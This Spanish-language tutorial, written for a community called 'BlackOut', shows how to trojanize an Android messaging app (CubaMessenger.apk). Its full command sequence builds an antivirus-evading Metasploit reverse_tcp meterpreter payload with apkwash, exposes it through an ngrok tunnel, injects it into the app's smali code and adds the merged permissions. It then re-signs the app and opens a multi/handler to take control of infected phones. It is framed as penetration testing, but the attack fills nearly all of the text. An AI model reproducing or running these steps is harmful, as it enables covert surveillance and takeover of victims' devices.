(B0) APK Embebida + Ngrok PDF

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 10

Aplicaciones Embebidas con Evasion de Antivirus + Ngrok

Este documento es creado para la comunidad BlackOut y tiene todos los derechos
reservados, cualquier copia o distribucion fuera de dicha comunidad constara como
una violacion de las leyes eticas de los miembros y se pedira la expulsion inmediata
de la comunidad.

Dado que se dieron problemas con el antiguo docunento a la hora de realizar


acciones(el antivirus detectaba la amenaza) decidi bajo las recomendaciones de los
miembros de la comunidad realizar este nuevo documento mostrando como evadir las
seguridad proporcionada por Antivirus en sistemas android.

Las pruebas realizadas en este documento se basan en ParrotOS pero son validas para
Kali Linux. Las herramientas necesarias para llevar a cabo las pruebas mostradas son:

• Metasploit-Framework
• Apktool
• apkwash
• keytool
• jarsinger
• zipaling
• ngrok

Previamente deben haber creado una cuenta en ngrok y tomar el API Token para
utilizarlo en dicha utilidad.

Luego de tener todo lo necesario pasemos a ubicar apkwash. Dandole permisos


(chmod +x apkwash) y copiandolo a (sudo cp apkwash /usr/local/bin)
Y realizamos el mismo procedimiento con apktool (chmod +x) (sudo cp
apktool_2.4.1.jar /usr/local/bin) NOTA: Cambiar el nombre del archivo por
apktool.jar

Hecho esto iniciamos nuestro servicio de ngrok, en mi caso lo hare por el puerto 443.

./ngrok tcp 443


Si ya esta configurado el authtoken no debe dar ningun error, de no ser asi debes
crear tu cuenta en ngrok copiar el API Token y agregarlo a tu archivo ngrok con el
comando ./ngrok authtoken seguido de tu API Token. De ya haber seguido este paso
deberia salir una ventana como la siguiente.

De la informacion brindada en dicha terminal solo utilizaremos la informacion de


Forwarding para crear nuestro payload.

Ahora ya podemos crear el payload.


Apkwash -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io
LPORT=11081 -o msf.apk

Creado el payload descargamos una aplicacion para usarla de recipiente y redirigir el


flujo de dicha aplicacion a nuestro payload. En este caso utilice CubaMessenger.apk

Descompilamos ambas aplicaciones.


java -jar apktool.jar d msf.apk
java -jar apktool.jar d CubaMessenger.apk
Ahora vamos a copiar la carpeta de nuestro payload dentro de la ubicacion
(smali/com) . Con una simple observacion veremos que el directorio metasploit no
existe y que fue modificado tanto dicho directorio como el archivo Payload.smali. :)

Buscamos el MainActivity.smali de la aplicacion, no me enfocare en hacer este punto


engorroso puesto que ya se mostro como hacerlo en el tutorial pasado. Como la vez
anterior buscamos la linea OnCreate.
Agregamos una linea nueva con un contenido similar a la de abajo para redirigir el
flujo hacia el payload. Nos quedaria algo como:
invoke-static {v0, v1},
Lcom/qnyqruhjme/uuqehxmwjo/srwlybodoo;→start(Ljava/lang/String;Ljava/
lang/String;)V

Ahora creamos un archivo con los permisos de ambas aplicaciones, los extraemos del
AnroidManifest con el comando.
cat AndroidManifest.xml | grep 'uses-permission' | xclip -sel clip
Teniendo todos los permisos en un archivo nos debe quedar algo asi.
Ahora copiamos todos los permisos sin que se repitan:
cat permisos.txt | sort -u | xclip -sel clip

Ahora en el AndroidManifest.xml de la aplicacion modificada eliminamos todos los


permisos con (uses-permission) y agregamos todos los permisos.

Ya podemos compilar la aplicacion pero primero eliminemos la original :)


rm CubaMessenger.apk

java -jar apktool.jar b CubaMessenger/ -o CubaMessenger.apk


Ahora podemos crear una llave para firmar nuestra aplicacion.

keytool -genkey -v -keystore cubamessenger.keystore -alias cubam -keyalg RSA -


keysize 2048 -validity 10000

Ahora firmamos la aplicacion con nuestra llave generada.


jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore
cubamessenger.keystore CubaMessenger.apk cubam
Ahora alineamos a 4bits con zipaling que aunque es un paso opcional aumenta el
rendimiento de la aplicacion.
zipalign -v 4 CubaMessenger.apk CubaMessenger_lite.apk

Ya terminado todo podemos ejecutar msfconsole (como root)y correr un


multi/handler.

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 443
exploit -j
Cuando tengamos una sesion abierta simplemente accedemos a ella con:
session -i seguido del numero de la sesion.

Eso es todo, espero que les sirva este documento para hacer pruebas de penetracion.

Creado por X4U7R


Cualquier duda o sugerencia contactar al +5354638522

También podría gustarte

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy